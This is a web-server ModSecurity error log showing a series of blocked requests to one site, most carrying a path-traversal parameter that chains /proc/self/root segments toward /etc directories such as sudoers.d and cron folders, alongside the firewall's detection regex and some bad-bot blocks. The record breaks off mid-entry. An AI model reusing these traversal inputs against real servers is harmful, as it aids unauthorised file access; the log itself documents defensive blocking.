[Wed Mar 18 12:13:51.950242 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:43572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBL8df6f5d65gmYZTkKgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:13:53.247115 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:43578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBMdY0UrI5A3LftIy_twAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:13:53.558810 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.228.61:52692] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrBMeoXxyEfFpUF8f98XgAAAVI"]
[Wed Mar 18 12:13:54.656971 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:43584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBMuyqAr6etmhZHNrTVgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:13:56.979789 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:43590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBNEzinOy1jxa1j4clSAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:13:57.215202 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.244.43:54984] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrBNfu8EFLIOrSqIpsTBgAAAlA"]
[Wed Mar 18 12:13:58.323181 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:43602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBNtY0UrI5A3LftIy_uQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:11.331682 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:40852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBQymAPhZkrhU8w4l82wAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:13.775659 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:45254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBRcdf6f5d65gmYZTkMAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:20.803059 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:45258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBTCmAPhZkrhU8w4l84wAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:25.213599 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:53204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBUdY0UrI5A3LftIy_0QAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:29.519733 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:36294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBVeyqAr6etmhZHNrThAAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:14:30.868897 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:53216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBVuw_le52K8_3pV3udQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:39.603198 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:41762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBX9Y0UrI5A3LftIy_3wAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:48.539388 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:41950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBZymAPhZkrhU8w4l9AQAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:52.523681 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:58806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBa-yqAr6etmhZHNrTkQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:53.879063 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:58818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBbSmAPhZkrhU8w4l9BQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:14:57.310983 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:58828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBcda6ubjKNq_cu4areQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:02.306170 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:58836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBdta6ubjKNq_cu4arfwAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:08.086660 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:44922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBfOyqAr6etmhZHNrTqAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:09.350179 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:44934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBfSmAPhZkrhU8w4l9CgAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:10.643105 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:57430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBfsdf6f5d65gmYZTkXQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:11.966219 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:57436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBfymAPhZkrhU8w4l9CwAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:14.377247 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:57442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 